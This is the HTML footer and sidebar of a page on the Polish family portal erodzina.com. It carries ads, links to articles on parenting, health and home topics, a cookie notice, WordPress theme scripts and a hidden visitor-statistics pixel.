	<script async="" src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<!-- Erodzina - Baner Pionowy 2019 -->
<ins class="adsbygoogle" style="display:inline-block;width:300px;height:600px" data-ad-client="ca-pub-3024020928900291" data-ad-slot="1330128853" data-adsbygoogle-status="done"><ins id="aswift_2_expand" style="display:inline-table;border:none;height:600px;margin:0;padding:0;position:relative;visibility:visible;width:300px;background-color:transparent;"><ins id="aswift_2_anchor" style="display:block;border:none;height:600px;margin:0;padding:0;position:relative;visibility:visible;width:300px;background-color:transparent;"><iframe width="300" height="600" frameborder="0" marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true" scrolling="no" allowfullscreen="true" onload="var i=this.id,s=window.google_iframe_oncopy,H=s&amp;&amp;s.handlers,h=H&amp;&amp;H[i],w=this.contentWindow,d;try{d=w.document}catch(e){}if(h&amp;&amp;d&amp;&amp;(!d.body||!d.body.firstChild)){if(h.call){setTimeout(h,0)}else if(h.match){try{h=s.upd(h,i)}catch(e){}w.location.replace(h)}}" id="aswift_2" name="aswift_2" style="left:0;position:absolute;top:0;border:0px;width:300px;height:600px;"></iframe></ins></ins></ins>
<script>
(adsbygoogle = window.adsbygoogle || []).push({});
</script>
</div></div></aside><aside class="td_block_template_1 widget widget_black_studio_tinymce"><h4 class="block-title"><span>Klub Wizjonerek</span></h4><div class="textwidget"><p style="text-align: center;"><strong>Rusza Klub Wizjonerek</strong>, już wkrótce spotkania, szkolenia, prelekcje.</p>
<p style="text-align: center;"><a href="https://www.facebook.com/groups/wizjonerki/" target="_blank" rel="noopener"><strong>DOŁĄCZ DO WIZJONEREK JUŻ DZIŚ</strong></a></p>
<p style="text-align: center;">Kobiety dla Kobiet o tym, jak prowadzić biznes i jak być szczęśliwą.</p>
</div></aside><aside class="td_block_template_1 widget widget_black_studio_tinymce"><h4 class="block-title"><span>Tylko polecane!</span></h4><div class="textwidget"><p></p><div id="basic-container"><article class="basic-layout lptw-columns-1 layout-light" style="padding-bottom: 10px; ">
<header>
<a class="overlay overlay-light lptw-post-thumbnail-link" href="http://www.erodzina.com/pomysly-na-prezent-swiateczny-do-500-zlotych/" target="_self"><span class="fluid-image-wrapper"><img src="http://www.erodzina.com/wp-content/uploads/2018/12/wesual-click-478189-unsplash-300x225.jpg" alt="Pomysły na prezent świąteczny do 500 złotych" class="fluid"></span>
</a><div class="lptw-post-header"><a class="lptw-post-title title-light" href="http://www.erodzina.com/pomysly-na-prezent-swiateczny-do-500-zlotych/" target="_self">Pomysły na prezent świąteczny do 500 złotych</a>
</div>
</header></article>
<article class="basic-layout lptw-columns-1 layout-light" style="padding-bottom: 10px; ">
<header>
<a class="overlay overlay-light lptw-post-thumbnail-link" href="http://www.erodzina.com/zespol-jelita-drazliwego-z-jakimi-chorobami-mozesz-go-pomylic/" target="_self"><span class="fluid-image-wrapper"><img src="http://www.erodzina.com/wp-content/uploads/2018/12/fotolia_190894491_subscription_monthly_xxl-300x200.jpg" alt="Zespół jelita drażliwego: z jakimi chorobami możesz go pomylić?" class="fluid"></span>
</a><div class="lptw-post-header"><a class="lptw-post-title title-light" href="http://www.erodzina.com/zespol-jelita-drazliwego-z-jakimi-chorobami-mozesz-go-pomylic/" target="_self">Zespół jelita drażliwego: z jakimi chorobami możesz go pomylić?</a>
</div>
</header></article>
<article class="basic-layout lptw-columns-1 layout-light" style="padding-bottom: 10px; ">
<header>
<a class="overlay overlay-light lptw-post-thumbnail-link" href="http://www.erodzina.com/w-co-ubrac-niemowlaka-na-spacer/" target="_self"><span class="fluid-image-wrapper"><img src="http://www.erodzina.com/wp-content/uploads/2018/11/fotolia_195528854_subscription_monthly_m-300x200.jpg" alt="W co ubrać niemowlaka na spacer?" class="fluid"></span>
</a><div class="lptw-post-header"><a class="lptw-post-title title-light" href="http://www.erodzina.com/w-co-ubrac-niemowlaka-na-spacer/" target="_self">W co ubrać niemowlaka na spacer?</a>
</div>
</header></article>
<article class="basic-layout lptw-columns-1 layout-light" style="padding-bottom: 10px; ">
<header>
<a class="overlay overlay-light lptw-post-thumbnail-link" href="http://www.erodzina.com/bol-stawow-co-oznacza-i-kiedy-zglosic-sie-do-specjalisty/" target="_self"><span class="fluid-image-wrapper"><img src="http://www.erodzina.com/wp-content/uploads/2018/11/steps-388914_1920-300x200.jpg" alt="Ból stawów – co oznacza i kiedy zgłosić się do specjalisty?" class="fluid"></span>
</a><div class="lptw-post-header"><a class="lptw-post-title title-light" href="http://www.erodzina.com/bol-stawow-co-oznacza-i-kiedy-zglosic-sie-do-specjalisty/" target="_self">Ból stawów – co oznacza i kiedy zgłosić się do specjalisty?</a>
</div>
</header></article>
<article class="basic-layout lptw-columns-1 layout-light" style="padding-bottom: 10px; ">
<header>
<a class="overlay overlay-light lptw-post-thumbnail-link" href="http://www.erodzina.com/niezwykla-lektura-dla-mlodych-milosnikow-przygod-explorer-academy-tajemnica-mglawicy/" target="_self"><span class="fluid-image-wrapper"><img src="http://www.erodzina.com/wp-content/uploads/2018/10/okladka-explorer-academy-300x265.jpg" alt="Niezwykła lektura dla młodych miłośników przygód – „Explorer Academy. Tajemnica mgławicy”" class="fluid"></span>
</a><div class="lptw-post-header"><a class="lptw-post-title title-light" href="http://www.erodzina.com/niezwykla-lektura-dla-mlodych-milosnikow-przygod-explorer-academy-tajemnica-mglawicy/" target="_self">Niezwykła lektura dla młodych miłośników przygód – „Explorer Academy. Tajemnica mgławicy”</a>
</div>
</header></article>
</div><p></p>
</div></aside><aside class="td_block_template_1 widget widget_black_studio_tinymce"><div class="textwidget"><p><a href="http://sastax.pl/ksiegowosc-jednoosobowej-dzialalnosci/" target="_blank" rel="noopener"><img class="aligncenter size-full wp-image-4032" src="http://www.erodzina.com/wp-content/uploads/2017/06/ksiegowosc-dzialanosc-gospodarcza.jpg" alt="" width="350" height="400"></a></p>
</div></aside><aside class="td_block_template_1 widget widget_black_studio_tinymce"><h4 class="block-title"><span>Poradnik Podatkowy</span></h4><div class="textwidget"><p style="text-align: center;"><a href="https://sastax.pl/odzyskac-podatek-vat-tytulu-wywlaszczenia/" target="_blank" rel="noopener">Jak odzyskać podatek VAT z tytułu wywłaszczenia?</a></p>
</div></aside>                            <div class="clearfix"></div></div>
                        </div>
                            </div> <!-- /.td-pb-row -->
    </div> <!-- /.td-container -->
</div> <!-- /.td-main-content-wrap -->

    <!-- Instagram -->
    
    <div class="td-footer-ad td-container-wrap">
            </div>

    <div class="td-footer-outer-wrapper td-container-wrap ">
        <!-- Footer -->
        <div class="td-footer-wrapper td-footer-template-2 ">
    <div class="td-container">
        <div class="td-pb-row">
            <div class="td-pb-span4">
                <div class="td_block_wrap td_block_3 td_uid_79_5c5e20b7b8e85_rand td-pb-border-top td_block_template_1 td-column-1" data-td-block-uid="td_uid_79_5c5e20b7b8e85"><script>var block_td_uid_79_5c5e20b7b8e85 = new tdBlock();
block_td_uid_79_5c5e20b7b8e85.id = "td_uid_79_5c5e20b7b8e85";
block_td_uid_79_5c5e20b7b8e85.atts = '{"limit":2,"sort":"featured","post_ids":"","tag_slug":"","autors_id":"","installed_post_types":"","category_id":"","category_ids":"","custom_title":"REDAKCJA","custom_url":"","show_child_cat":"","sub_cat_ajax":"","ajax_pagination":"","header_color":"","header_text_color":"","ajax_pagination_infinite_stop":"","td_column_number":1,"td_ajax_preloading":"","td_ajax_filter_type":"","td_ajax_filter_ids":"","td_filter_default_txt":"Wszystko","color_preset":"","border_top":"","class":"td_uid_79_5c5e20b7b8e85_rand","el_class":"","offset":"","css":"","tdc_css":"","tdc_css_class":"td_uid_79_5c5e20b7b8e85_rand","tdc_css_class_style":"td_uid_79_5c5e20b7b8e85_rand_style","live_filter":"","live_filter_cur_post_id":"","live_filter_cur_post_author":"","block_template_id":""}';
block_td_uid_79_5c5e20b7b8e85.td_column_number = "1";
block_td_uid_79_5c5e20b7b8e85.block_type = "td_block_3";
block_td_uid_79_5c5e20b7b8e85.post_count = "2";
block_td_uid_79_5c5e20b7b8e85.found_posts = "3";
block_td_uid_79_5c5e20b7b8e85.header_color = "";
block_td_uid_79_5c5e20b7b8e85.ajax_pagination_infinite_stop = "";
block_td_uid_79_5c5e20b7b8e85.max_num_pages = "2";
tdBlocksArray.push(block_td_uid_79_5c5e20b7b8e85);
</script><div class="td-block-title-wrap"><h4 class="block-title"><span>REDAKCJA</span></h4></div><div id="td_uid_79_5c5e20b7b8e85" class="td_block_inner">
        <div class="td_module_3 td_module_wrap td-animation-stack">
            <div class="td-module-image td-module-image-float">
                <div class="td-module-thumb"><a href="http://www.erodzina.com/witaminy-i-mineraly-na-zdrowa-skore/" rel="bookmark" title="Witaminy i minerały na zdrową skórę"><img width="100" height="70" class="entry-thumb td-animation-stack-type0-1" src="http://www.erodzina.com/wp-content/uploads/2018/07/girl-2189248_1280-100x70.jpg" alt="" title="Witaminy i minerały na zdrową skórę"></a></div>            </div>

            <div class="td-item-details td-no-comment td-category-small">
                <h3 class="entry-title td-module-title"><a href="http://www.erodzina.com/witaminy-i-mineraly-na-zdrowa-skore/" rel="bookmark" title="Witaminy i minerały na zdrową skórę">Witaminy i minerały na zdrową skórę</a></h3>
                <div class="td-module-meta-info">
                    <a href="http://www.erodzina.com/kategoria/uroda-i-styl/skora-i-wlosy/" class="td-post-category">Skóra i włosy</a>                    <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2018-07-16T14:50:19+00:00">16 lipca 2018</time></span>                </div>
            </div>

                        <div class="clearfix"></div>
        </div>

        
        <div class="td_module_3 td_module_wrap td-animation-stack">
            <div class="td-module-image td-module-image-float">
                <div class="td-module-thumb"><a href="http://www.erodzina.com/1-miesiac-ciazy-zmiany-fizjologiczne-w-organizmie-kobiety/" rel="bookmark" title="1 miesiąc ciąży – zmiany fizjologiczne w organizmie kobiety"><img width="100" height="70" class="entry-thumb td-animation-stack-type0-1" src="http://www.erodzina.com/wp-content/uploads/2018/05/erodzina-com-pierwszy-miesiac-ciazy-100x70.jpg" alt="" title="1 miesiąc ciąży – zmiany fizjologiczne w organizmie kobiety"></a></div>            </div>

            <div class="td-item-details td-no-comment td-category-small">
                <h3 class="entry-title td-module-title"><a href="http://www.erodzina.com/1-miesiac-ciazy-zmiany-fizjologiczne-w-organizmie-kobiety/" rel="bookmark" title="1 miesiąc ciąży – zmiany fizjologiczne w organizmie kobiety">1 miesiąc ciąży – zmiany fizjologiczne w organizmie kobiety</a></h3>
                <div class="td-module-meta-info">
                    <a href="http://www.erodzina.com/kategoria/ciaza-i-porod/ciaza/" class="td-post-category">Ciąża</a>                    <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2018-05-17T20:03:29+00:00">17 maja 2018</time></span>                </div>
            </div>

                        <div class="clearfix"></div>
        </div>

        </div></div> <!-- ./block -->                            </div>

            <div class="td-pb-span4">
                <div class="td_block_wrap td_block_3 td_uid_80_5c5e20b7b9971_rand td-pb-border-top td_block_template_1 td-column-1" data-td-block-uid="td_uid_80_5c5e20b7b9971"><script>var block_td_uid_80_5c5e20b7b9971 = new tdBlock();
block_td_uid_80_5c5e20b7b9971.id = "td_uid_80_5c5e20b7b9971";
block_td_uid_80_5c5e20b7b9971.atts = '{"limit":2,"sort":"popular","post_ids":"","tag_slug":"","autors_id":"","installed_post_types":"","category_id":"","category_ids":"","custom_title":"POPULARNE POSTY","custom_url":"","show_child_cat":"","sub_cat_ajax":"","ajax_pagination":"","header_color":"","header_text_color":"","ajax_pagination_infinite_stop":"","td_column_number":1,"td_ajax_preloading":"","td_ajax_filter_type":"","td_ajax_filter_ids":"","td_filter_default_txt":"Wszystko","color_preset":"","border_top":"","class":"td_uid_80_5c5e20b7b9971_rand","el_class":"","offset":"","css":"","tdc_css":"","tdc_css_class":"td_uid_80_5c5e20b7b9971_rand","tdc_css_class_style":"td_uid_80_5c5e20b7b9971_rand_style","live_filter":"","live_filter_cur_post_id":"","live_filter_cur_post_author":"","block_template_id":""}';
block_td_uid_80_5c5e20b7b9971.td_column_number = "1";
block_td_uid_80_5c5e20b7b9971.block_type = "td_block_3";
block_td_uid_80_5c5e20b7b9971.post_count = "2";
block_td_uid_80_5c5e20b7b9971.found_posts = "186";
block_td_uid_80_5c5e20b7b9971.header_color = "";
block_td_uid_80_5c5e20b7b9971.ajax_pagination_infinite_stop = "";
block_td_uid_80_5c5e20b7b9971.max_num_pages = "93";
tdBlocksArray.push(block_td_uid_80_5c5e20b7b9971);
</script><div class="td-block-title-wrap"><h4 class="block-title"><span>POPULARNE POSTY</span></h4></div><div id="td_uid_80_5c5e20b7b9971" class="td_block_inner">
        <div class="td_module_3 td_module_wrap td-animation-stack">
            <div class="td-module-image td-module-image-float">
                <div class="td-module-thumb"><a href="http://www.erodzina.com/hodowanie-psow-przegladarce-czemu/" rel="bookmark" title="Hodowanie psów w przeglądarce – czemu nie?"><img width="100" height="61" class="entry-thumb td-animation-stack-type0-1" src="http://www.erodzina.com/wp-content/uploads/2017/08/justin-veenema-31135.jpg" srcset="http://www.erodzina.com/wp-content/uploads/2017/08/justin-veenema-31135.jpg 1000w, http://www.erodzina.com/wp-content/uploads/2017/08/justin-veenema-31135-300x182.jpg 300w, http://www.erodzina.com/wp-content/uploads/2017/08/justin-veenema-31135-768x467.jpg 768w, http://www.erodzina.com/wp-content/uploads/2017/08/justin-veenema-31135-209x130.jpg 209w" sizes="(max-width: 100px) 100vw, 100px" alt="" title="Hodowanie psów w przeglądarce – czemu nie?"></a></div>            </div>

            <div class="td-item-details td-no-comment td-category-small">
                <h3 class="entry-title td-module-title"><a href="http://www.erodzina.com/hodowanie-psow-przegladarce-czemu/" rel="bookmark" title="Hodowanie psów w przeglądarce – czemu nie?">Hodowanie psów w przeglądarce – czemu nie?</a></h3>
                <div class="td-module-meta-info">
                    <a href="http://www.erodzina.com/kategoria/porady-i-kuchnia/porady-domowe/" class="td-post-category">Porady domowe</a>                    <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2017-08-31T22:16:35+00:00">31 sierpnia 2017</time></span>                </div>
            </div>

                        <div class="clearfix"></div>
        </div>

        
        <div class="td_module_3 td_module_wrap td-animation-stack">
            <div class="td-module-image td-module-image-float">
                <div class="td-module-thumb"><a href="http://www.erodzina.com/pompy-glebinowe-co-warto-o-nich-wiedziec/" rel="bookmark" title="Pompy głębinowe – co warto o nich wiedzieć?"><img width="100" height="66" class="entry-thumb td-animation-stack-type0-1" src="http://www.erodzina.com/wp-content/uploads/2018/03/pg3.jpg" srcset="http://www.erodzina.com/wp-content/uploads/2018/03/pg3.jpg 265w, http://www.erodzina.com/wp-content/uploads/2018/03/pg3-127x85.jpg 127w, http://www.erodzina.com/wp-content/uploads/2018/03/pg3-101x68.jpg 101w" sizes="(max-width: 100px) 100vw, 100px" alt="" title="Pompy głębinowe – co warto o nich wiedzieć?"></a></div>            </div>

            <div class="td-item-details td-no-comment td-category-small">
                <h3 class="entry-title td-module-title"><a href="http://www.erodzina.com/pompy-glebinowe-co-warto-o-nich-wiedziec/" rel="bookmark" title="Pompy głębinowe – co warto o nich wiedzieć?">Pompy głębinowe – co warto o nich wiedzieć?</a></h3>
                <div class="td-module-meta-info">
                    <a href="http://www.erodzina.com/kategoria/dom-i-mieszkanie/budujemy-i-remontujemy/" class="td-post-category">Budujemy i Remontujemy</a>                    <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2018-03-13T15:50:38+00:00">13 marca 2018</time></span>                </div>
            </div>

                        <div class="clearfix"></div>
        </div>

        </div></div> <!-- ./block -->                            </div>

            <div class="td-pb-span4">
                <div class="td_block_wrap td_block_popular_categories td_uid_81_5c5e20b7ba33a_rand widget widget_categories td-pb-border-top td_block_template_1" data-td-block-uid="td_uid_81_5c5e20b7ba33a"><div class="td-block-title-wrap"><h4 class="block-title"><span>POPULARNE KATEGORIE</span></h4></div><ul><li><a href="http://www.erodzina.com/kategoria/zdrowie-i-opieka/">Zdrowie i Opieka<span class="td-cat-no">632</span></a></li><li><a href="http://www.erodzina.com/kategoria/zycie-i-rodzina/">Życie i Rodzina<span class="td-cat-no">317</span></a></li><li><a href="http://www.erodzina.com/kategoria/zdrowie-i-opieka/zdrowie-rodziny/">Zdrowie rodziny<span class="td-cat-no">311</span></a></li><li><a href="http://www.erodzina.com/kategoria/uroda-i-styl/">Uroda i Styl<span class="td-cat-no">240</span></a></li><li><a href="http://www.erodzina.com/kategoria/porady-i-kuchnia/">Porady i Kuchnia<span class="td-cat-no">185</span></a></li></ul></div> <!-- ./block -->                            </div>
        </div>

        <div class="td-pb-row">
            <div class="td-pb-span12"><aside class="footer-social-wrap">
            <span class="td-social-icon-wrap">
                <a target="_blank" href="https://www.facebook.com/erodzinacom-255288531163995/" title="Facebook">
                    <i class="td-icon-font td-icon-facebook"></i>
                    <span class="td-social-name">Facebook</span>
                </a>
            </span></aside></div><div class="td-pb-span12"><aside class="footer-logo-wrap"><a href="http://www.erodzina.com/"><img src="http://www.erodzina.com/wp-content/uploads/2016/03/logo-2.gif" alt="" title=""></a></aside></div><div class="td-pb-span12"><aside class="footer-text-wrap">erodzina.com - Twój Portal Rodzinny - Sprawy rodzinne są dla nas najważniejsze!</aside></div>        </div>
    </div>
</div>
        <!-- Sub Footer -->
            <div class="td-sub-footer-container">
        <div class="td-container">
            <div class="td-pb-row">
                <div class="td-pb-span12 td-sub-footer-menu">
                    <div class="menu-footer-container"><ul id="menu-footer" class="td-subfooter-menu"><li id="menu-item-2358" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-first td-menu-item td-normal-menu menu-item-2358"><a href="http://www.erodzina.com/o-nas/">O Nas</a></li>
<li id="menu-item-5114" class="menu-item menu-item-type-post_type menu-item-object-page td-menu-item td-normal-menu menu-item-5114"><a href="http://www.erodzina.com/wspolpraca/">Współpraca</a></li>
<li id="menu-item-2374" class="menu-item menu-item-type-post_type menu-item-object-page td-menu-item td-normal-menu menu-item-2374"><a href="http://www.erodzina.com/kontakt/">Kontakt</a></li>
</ul></div>                </div>

                <div class="td-pb-span12 td-sub-footer-copy">
                    © erodzina.com / 2004-2018
                </div>
            </div>
        </div>
    </div>
    
    </div>
</div><script async="" type="text/javascript" src="//ustat.info/13538133.i874cwvr6wyjuxfv3zi7luvvbbytiw"></script><!--close td-outer-wrap-->

                <div class="td-more-articles-box">
                    <i class="td-icon-close td-close-more-articles-box"></i>
                    <span class="td-more-articles-box-title">WIĘCEJ HISTORII</span>
                    <div class="td-content-more-articles-box">

                    
        <div class="td_module_1 td_module_wrap td-animation-stack">
            <div class="td-module-image">
                <div class="td-module-thumb"><a href="http://www.erodzina.com/ksiazki-dla-dzieci-nie-tylko-polsku/" rel="bookmark" title="Książki dla dzieci nie tylko polsku"><img width="300" height="220" class="entry-thumb td-animation-stack-type0-2" src="http://www.erodzina.com/wp-content/uploads/2019/02/główne_Big-Fish-Little-Fish-boSPREAD-1-300x220.jpg" srcset="http://www.erodzina.com/wp-content/uploads/2019/02/główne_Big-Fish-Little-Fish-boSPREAD-1-300x220.jpg 300w, http://www.erodzina.com/wp-content/uploads/2019/02/główne_Big-Fish-Little-Fish-boSPREAD-1-80x60.jpg 80w, http://www.erodzina.com/wp-content/uploads/2019/02/główne_Big-Fish-Little-Fish-boSPREAD-1-198x145.jpg 198w" sizes="(max-width: 300px) 100vw, 300px" alt="" title="Książki dla dzieci nie tylko polsku"></a></div>                <div class="td-post-category-wrap"><a href="http://www.erodzina.com/kategoria/rozrywka-i-hobby/ksiazki-i-magazyny/" class="td-post-category">Książki i magazyny</a></div>
            </div>
            
            <h3 class="entry-title td-module-title"><a href="http://www.erodzina.com/ksiazki-dla-dzieci-nie-tylko-polsku/" rel="bookmark" title="Książki dla dzieci nie tylko polsku">Książki dla dzieci nie tylko polsku</a></h3>
            <div class="td-module-meta-info">
                                <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2019-02-04T16:20:34+00:00">4 lutego 2019</time></span>                            </div>

                    </div>

        
        <div class="td_module_1 td_module_wrap td-animation-stack">
            <div class="td-module-image">
                <div class="td-module-thumb"><a href="http://www.erodzina.com/zdrowe-kaszki-dla-niemowlat-takze-dla-alergikow/" rel="bookmark" title="Zdrowe kaszki dla niemowląt także dla alergików"><img width="300" height="220" class="entry-thumb td-animation-stack-type0-1" src="http://www.erodzina.com/wp-content/uploads/2019/02/9e7ae08563048ee9b9ae9085db55b3a6-300x220.jpg" srcset="http://www.erodzina.com/wp-content/uploads/2019/02/9e7ae08563048ee9b9ae9085db55b3a6-300x220.jpg 300w, http://www.erodzina.com/wp-content/uploads/2019/02/9e7ae08563048ee9b9ae9085db55b3a6-80x60.jpg 80w, http://www.erodzina.com/wp-content/uploads/2019/02/9e7ae08563048ee9b9ae9085db55b3a6-198x145.jpg 198w" sizes="(max-width: 300px) 100vw, 300px" alt="" title="Zdrowe kaszki dla niemowląt także dla alergików"></a></div>                <div class="td-post-category-wrap"><a href="http://www.erodzina.com/kategoria/ciaza-i-porod/karmienie/" class="td-post-category">Karmienie</a></div>
            </div>
            
            <h3 class="entry-title td-module-title"><a href="http://www.erodzina.com/zdrowe-kaszki-dla-niemowlat-takze-dla-alergikow/" rel="bookmark" title="Zdrowe kaszki dla niemowląt także dla alergików">Zdrowe kaszki dla niemowląt także dla alergików</a></h3>
            <div class="td-module-meta-info">
                                <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2019-02-04T16:05:44+00:00">4 lutego 2019</time></span>                            </div>

                    </div>

                            </div>
                </div>

    <!--

        Theme: ionMag by tagDiv.com 2017
        Version: 2.1 (rara)
        Deploy mode: deploy
        
        uid: 5c5e20b7bd0f4
    -->

    <script type="text/javascript" src="http://www.erodzina.com/wp-includes/js/imagesloaded.min.js?ver=3.2.0"></script>
<script type="text/javascript" src="http://www.erodzina.com/wp-includes/js/masonry.min.js?ver=3.3.2"></script>
<script type="text/javascript" src="http://www.erodzina.com/wp-includes/js/jquery/jquery.masonry.min.js?ver=3.1.2b"></script>
<script type="text/javascript" src="http://www.erodzina.com/wp-content/plugins/advanced-recent-posts/lptw-recent-posts.js?ver=08d9606e383c22a2a96301a016ee3d3c"></script>
<script type="text/javascript" src="http://www.erodzina.com/wp-content/plugins/anti-spam/js/anti-spam-5.3.js"></script>
<script type="text/javascript" src="http://www.erodzina.com/wp-content/themes/ionMag/js/tagdiv_theme.min.js?ver=2.1"></script>
<script type="text/javascript" src="http://www.erodzina.com/wp-includes/js/comment-reply.min.js?ver=08d9606e383c22a2a96301a016ee3d3c"></script>
<script type="text/javascript" src="http://www.erodzina.com/wp-includes/js/wp-embed.min.js?ver=08d9606e383c22a2a96301a016ee3d3c"></script>

<!-- JS generated by theme -->

<script>
    

	

		(function(){
			var html_jquery_obj = jQuery('html');

			if (html_jquery_obj.length && (html_jquery_obj.is('.ie8') || html_jquery_obj.is('.ie9'))) {

				var path = 'http://www.erodzina.com/wp-content/themes/ionMag/style.css';

				jQuery.get(path, function(data) {

					var str_split_separator = '#td_css_split_separator';
					var arr_splits = data.split(str_split_separator);
					var arr_length = arr_splits.length;

					if (arr_length > 1) {

						var dir_path = 'http://www.erodzina.com/wp-content/themes/ionMag';
						var splited_css = '';

						for (var i = 0; i < arr_length; i++) {
							if (i > 0) {
								arr_splits[i] = str_split_separator + ' ' + arr_splits[i];
							}
							//jQuery('head').append('<style>' + arr_splits[i] + '</style>');

							var formated_str = arr_splits[i].replace(/\surl\(\'(?!data\:)/gi, function regex_function(str) {
								return ' url(\'' + dir_path + '/' + str.replace(/url\(\'/gi, '').replace(/^\s+|\s+$/gm,'');
							});

							splited_css += "<style>" + formated_str + "</style>";
						}

						var td_theme_css = jQuery('link#td-theme-css');

						if (td_theme_css.length) {
							td_theme_css.after(splited_css);
						}
					}
				});
			}
		})();

	
	
</script>


			<div id="cookie-notice" role="banner" class="cn-bottom bootstrap" style="color: rgb(255, 255, 255); background-color: rgb(0, 0, 0); visibility: visible;"><div class="cookie-notice-container"><span id="cn-notice-text">Ta strona korzysta z ciasteczek aby świadczyć usługi na najwyższym poziomie. Dalsze korzystanie ze strony oznacza, że zgadzasz się na ich użycie.</span><a href="#" id="cn-accept-cookie" data-cookie-set="accept" class="cn-set-cookie cn-button bootstrap button">Zamknij</a>
				</div>
				
			</div>

			<div id="tdw-css-writer" style="display: none" class="tdw-drag-dialog tdc-window-sidebar">
				<header>

				
					<a title="Editor" class="tdw-tab tdc-tab-active" href="#" data-tab-content="tdw-tab-editor">Edit with Live CSS</a>
					<div class="tdw-less-info" title="This will be red when errors are detected in your CSS and LESS"></div>
				
				</header>
				<div class="tdw-content">

					
					<div class="tdw-tabs-content tdw-tab-editor tdc-tab-content-active">


						<script>

							(function(jQuery, undefined) {

								jQuery(window).ready(function() {

									if ( 'undefined' !== typeof tdcAdminIFrameUI ) {
										var $liveIframe  = tdcAdminIFrameUI.getLiveIframe();

										if ( $liveIframe.length ) {
											$liveIframe.load(function() {
												$liveIframe.contents().find( 'body').append( '<textarea class="tdw-css-writer-editor" style="display: none"></textarea>' );
											});
										}
									}

								});

							})(jQuery);

						</script>


						<textarea class="tdw-css-writer-editor td_live_css_uid_1_5c5e20b7bd239"></textarea>
						<div id="td_live_css_uid_1_5c5e20b7bd239" class="td-code-editor"></div>


						<script>
							jQuery(window).load(function (){

								if ( 'undefined' !== typeof tdLiveCssInject ) {

									tdLiveCssInject.init();


									var editor_textarea = jQuery('.td_live_css_uid_1_5c5e20b7bd239');
									var languageTools = ace.require("ace/ext/language_tools");
									var tdcCompleter = {
										getCompletions: function (editor, session, pos, prefix, callback) {
											if (prefix.length === 0) {
												callback(null, []);
												return
											}

											if ('undefined' !== typeof tdcAdminIFrameUI) {

												var data = {
													error: undefined,
													getShortcode: ''
												};

												tdcIFrameData.getShortcodeFromData(data);

												if (!_.isUndefined(data.error)) {
													tdcDebug.log(data.error);
												}

												if (!_.isUndefined(data.getShortcode)) {

													var regex = /el_class=\"([A-Za-z0-9_-]*\s*)+\"/g,
														results = data.getShortcode.match(regex);

													var elClasses = {};

													for (var i = 0; i < results.length; i++) {
														var currentClasses = results[i]
															.replace('el_class="', '')
															.replace('"', '')
															.split(' ');

														for (var j = 0; j < currentClasses.length; j++) {
															if (_.isUndefined(elClasses[currentClasses[j]])) {
																elClasses[currentClasses[j]] = '';
															}
														}
													}

													var arrElClasses = [];

													for (var prop in elClasses) {
														arrElClasses.push(prop);
													}

													callback(null, arrElClasses.map(function (item) {
														return {
															name: item,
															value: item,
															meta: 'in_page'
														}
													}));
												}
											}
										}
									};
									languageTools.addCompleter(tdcCompleter);

									window.editor = ace.edit("td_live_css_uid_1_5c5e20b7bd239");

									// 'change' handler is written as function because it's called by tdc_on_add_css_live_components (of wp_footer hook)
									// We did it to reattach the existing compiled css to the new content received from server.
									window.editorChangeHandler = function () {
										//tdwState.lessWasEdited = true;

										window.onbeforeunload = function () {
											if (tdwState.lessWasEdited) {
												return "You have attempted to leave this page. Are you sure?";
											}
											return false;
										};

										var editorValue = editor.getSession().getValue();

										editor_textarea.val(editorValue);

										if ('undefined' !== typeof tdcAdminIFrameUI) {
											tdcAdminIFrameUI.getLiveIframe().contents().find('.tdw-css-writer-editor:first').val(editorValue);

											// Mark the content as modified
											// This is important for showing info when composer closes
                                            tdcMain.setContentModified();
										}

										tdLiveCssInject.less();
									};

									editor.getSession().setValue(editor_textarea.val());
									editor.getSession().on('change', editorChangeHandler);

									editor.setTheme("ace/theme/textmate");
									editor.setShowPrintMargin(false);
									editor.getSession().setMode("ace/mode/less");
									editor.setOptions({
										enableBasicAutocompletion: true,
										enableSnippets: true,
										enableLiveAutocompletion: false
									});

								}

							});
						</script>

					</div>
				</div>

				<footer>

					
						<a href="#" class="tdw-save-css">Save</a>
						<div class="tdw-more-info-text">Write CSS OR LESS and hit save. CTRL + SPACE for auto-complete.</div>

					
					<div class="tdw-resize"></div>
				</footer>
			</div>
			

<iframe scrolling="no" frameborder="0" allowtransparency="true" src="https://platform.twitter.com/widgets/widget_iframe.5b0c4d3ea3997aa2c22eac39be510646.html?origin=http%3A%2F%2Fwww.erodzina.com&amp;settingsEndpoint=https%3A%2F%2Fsyndication.twitter.com%2Fsettings" title="Twitter settings iframe" style="display: none;"></iframe><img src="https://ustat.info/i874cwvr6wyjuxfv3zi7luvvbbytiw_1?sess=39966639227684&amp;mob=0&amp;sy=Linux x86_64&amp;ua=Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36&amp;lg=C&amp;url=http%3A%2F%2Fwww.erodzina.com%2Fpity-osob-duchownych%2F&amp;ifr=0&amp;ref=&amp;t=1581208581994" style="position: absolute !important; visibility: hidden !important;"><iframe id="google_osd_static_frame_1675026984051" name="google_osd_static_frame" style="display: none; width: 0px; height: 0px;"></iframe></body><iframe id="google_shimpl" style="display: none;"></iframe><iframe id="google_esf" name="google_esf" src="https://googleads.g.doubleclick.net/pagead/html/r20190204/r20190131/zrt_lookup.html#" data-ad-client="ca-pub-3024020928900291" style="display: none;"></iframe></html>